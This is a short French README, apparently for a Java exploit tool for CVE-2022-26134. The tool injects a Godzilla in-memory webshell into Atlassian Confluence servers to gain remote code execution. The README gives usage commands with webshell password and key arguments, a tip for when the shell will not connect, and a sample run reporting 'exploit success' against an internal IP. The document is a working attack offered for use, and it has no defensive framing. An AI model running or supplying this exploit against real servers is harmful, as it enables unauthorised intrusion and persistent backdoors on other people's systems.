
Exploit basé sur Java pour CVE-2022-26134 qui injecte un webshell Godzilla dans les serveurs Confluence, permettant l'exécution de code à distance avec authentification par mot de passe et clé.
java -jar CVE-2022-26134.jar mot_de_passe_Godzilla clé_Godzilla
exemple
java -jar CVE-2022-26134.jar pass key
Si le shell mémoire a été injecté avec succès mais que Godzilla ne peut pas se connecter, veuillez ajouter l'en-tête suivant dans la configuration de la requête ou configurer un proxy Burp pour Godzilla.
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>
